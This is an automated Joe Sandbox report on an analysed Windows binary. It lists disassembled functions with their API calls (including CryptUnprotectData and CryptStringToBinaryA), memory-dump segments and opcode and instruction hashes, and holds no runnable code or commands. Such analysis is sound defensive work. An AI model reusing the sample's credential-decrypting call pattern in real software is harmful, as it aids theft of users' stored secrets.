                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: b0d8ebe8e9e81633f6a259fa6cc16757df6a6c5c1274f492544660c3b08f80b0
                                    • Instruction ID: a8e29a3a2cb7a4633dc680ad00c005d09166077a8eaf9da3db6f8dfcfcf825bf
                                    • Opcode Fuzzy Hash: b0d8ebe8e9e81633f6a259fa6cc16757df6a6c5c1274f492544660c3b08f80b0
                                    • Instruction Fuzzy Hash: 080152B2904128ABCB249BCADD45FBFB7BCFB4DB11F00011AF625A2280E7795840C7B1
                                    Function 00F69B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00F69B3B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F69B4A
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00F69B61
                                    • LocalFree.KERNEL32 ref: 00F69B70
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: 224cd8933deaabad2c8f4d96f9854fd30490e8c8cc2f1b7c8dc951b0ebaf3ba3
                                    • Instruction ID: 2ea600fe6e2c7daf95df5fe710c4227b28cba67346a5deec516e85a3df90a477
                                    • Opcode Fuzzy Hash: 224cd8933deaabad2c8f4d96f9854fd30490e8c8cc2f1b7c8dc951b0ebaf3ba3
                                    • Instruction Fuzzy Hash: 2BF01D707443126BFB301F65AC4AF967BACEF44B60F240128FA55EA2D4D7B09880CBA4
                                    Function 00F7CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(00F8B110,00000000,00000001,00F8B100,?), ref: 00F7CB06
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00F7CB46
                                    • lstrcpyn.KERNEL32(?,?,00000104), ref: 00F7CBC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                    • String ID:
                                    • API String ID: 1940255200-0
                                    • Opcode ID: 51421798860e513ea208689c9750f602de3ec5ae43e6ea52af746ce8f5e4913b
                                    • Instruction ID: 09e14a04a05b4b2362858c6d1a7e4dd53e57659af97d30ccd8e28f74a5917087
                                    • Opcode Fuzzy Hash: 51421798860e513ea208689c9750f602de3ec5ae43e6ea52af746ce8f5e4913b
                                    • Instruction Fuzzy Hash: 4F318671A40618AFD710DB98CC96F9977B99B88B10F004194FA14EB2D0D7B0ED44CB91
                                    Function 00F69B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F69B9F
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00F69BB3
                                    • LocalFree.KERNEL32(?), ref: 00F69BD7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: aa6992f05c9955b54be81f6f60f3070241eaf179d8e753dd56c71d7f3badfecd
                                    • Instruction ID: 9e1b2eead1f7be13cac1eed9eadef8ea634170080cdcf12afaa17e39051ae31f
                                    • Opcode Fuzzy Hash: aa6992f05c9955b54be81f6f60f3070241eaf179d8e753dd56c71d7f3badfecd
                                    • Instruction Fuzzy Hash: 330112B5E413096BE7149BA4DC45FAEB77CEB84700F104568EA14AB284D7B49E0487D1
                                    Function 0131F6F9 Relevance: 3.9, Strings: 2, Instructions: 1419COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: >93_$wyoQ
                                    • API String ID: 0-2578126433
                                    • Opcode ID: 265584ed7f851db84cc0d2b9c758dbeccc52e32d027aabd4f71cb8b899067395
                                    • Instruction ID: 10f1ed35feccde59dbea23d9239e5b959edc41dbf3a369748b9f9390802b60c7
                                    • Opcode Fuzzy Hash: 265584ed7f851db84cc0d2b9c758dbeccc52e32d027aabd4f71cb8b899067395
                                    • Instruction Fuzzy Hash: 0EA2D5F360C600AFE704AF29EC8567ABBE9EF94720F16493DE6C4C7744E63558408697
                                    Function 013287CA Relevance: 3.2, Strings: 2, Instructions: 662COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: |xO$|[
                                    • API String ID: 0-488323096
                                    • Opcode ID: f95eab0dbb3495e2ad418f5454b6aa9766b536a10902f4e926d46d0bf604470e
                                    • Instruction ID: 81eee3f4c1e7e090b7e707d680f52fc73dfb6e2fd107968a909474a1276817a4
                                    • Opcode Fuzzy Hash: f95eab0dbb3495e2ad418f5454b6aa9766b536a10902f4e926d46d0bf604470e
                                    • Instruction Fuzzy Hash: 8922F9F360C6049FE304AE2DDC8566AFBE9EF94320F164A3DEAD4C3740EA3558158697
                                    Function 0120A793 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Z7
                                    • API String ID: 0-4264498725
                                    • Opcode ID: fc0266fd930a66f52fda9fe26213ead1e5033642ce098422bbde41be8c384d2c
                                    • Instruction ID: 8a3a2ef7b7cdd2507b290369ca99b49131663e84f846a893feaddba67bc1cfd5
                                    • Opcode Fuzzy Hash: fc0266fd930a66f52fda9fe26213ead1e5033642ce098422bbde41be8c384d2c
                                    • Instruction Fuzzy Hash: 3E71F3F3E087109BE3146A2DEC8576AFBE5EB94720F1B453DDAC897380E9795C0486C6
                                    Function 0127A6DB Relevance: .2, Instructions: 184COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5b664fb0573a2b2c2e8fd89ca3c9f49df9851b68d53519ccf47bfd2afb8c3844
                                    • Instruction ID: f582bbd4fc66cb5807d0addf88357bb231e7b7f2a68bb4eb72fb49b426ed17b8
                                    • Opcode Fuzzy Hash: 5b664fb0573a2b2c2e8fd89ca3c9f49df9851b68d53519ccf47bfd2afb8c3844
                                    • Instruction Fuzzy Hash: 995119F3A0C2149BE3087E29EC5577BBADADBD4320F1B453DE7D883780E93A58014696
                                    Function 0130AC4B Relevance: .1, Instructions: 125COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4e6167b4698de6f3a40c214b63f582359bb0070f054b74b12b1156891aa62e8c
                                    • Instruction ID: 8b2445bc2a90d691b29614bba459d65569d41210cc82fa6eb413580b75285ee3
                                    • Opcode Fuzzy Hash: 4e6167b4698de6f3a40c214b63f582359bb0070f054b74b12b1156891aa62e8c
                                    • Instruction Fuzzy Hash: 1141F3F39187149FE3086E24EC4637AB7D4EB54310F1A893DEBC9D7380EA794841978A
                                    Function 013D7BA4 Relevance: .1, Instructions: 82COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b6f52173eba6c0cd5e8ce57c68523106f27917382e6f8a55d113f3a6a9893bd
                                    • Instruction ID: 83524f361edd6055be61ad386c4f233956717774262ac58d82e91390a0beb1db
                                    • Opcode Fuzzy Hash: 2b6f52173eba6c0cd5e8ce57c68523106f27917382e6f8a55d113f3a6a9893bd
                                    • Instruction Fuzzy Hash: 6621ADF281C7049FD309BF19DC826BAF7E9FF58210F16492DEAC493310EA7558508A87
                                    Function 00F785B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 00F78636
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7866D
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00F786AA
                                    • StrStrA.SHLWAPI(?,00A9E130), ref: 00F786CF
                                    • lstrcpyn.KERNEL32(011993D0,?,00000000), ref: 00F786EE
                                    • lstrlen.KERNEL32(?), ref: 00F78701
                                    • wsprintfA.USER32 ref: 00F78711
                                    • lstrcpy.KERNEL32(?,?), ref: 00F78727
                                    • StrStrA.SHLWAPI(?,00A9E148), ref: 00F78754
                                    • lstrcpy.KERNEL32(?,011993D0), ref: 00F787B4
                                    • StrStrA.SHLWAPI(?,00A9E160), ref: 00F787E1
                                    • lstrcpyn.KERNEL32(011993D0,?,00000000), ref: 00F78800
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                    • String ID: %s%s
                                    • API String ID: 2672039231-3252725368
                                    • Opcode ID: 2b0e2820d60f7f5bfcf1b3c306b278f9a601694c88a14e36671720407dda852b
                                    • Instruction ID: b3d4d02c7420f01d0d64ba8b7385922c6ff447d1f15f7ae2d3e499433df4faf7
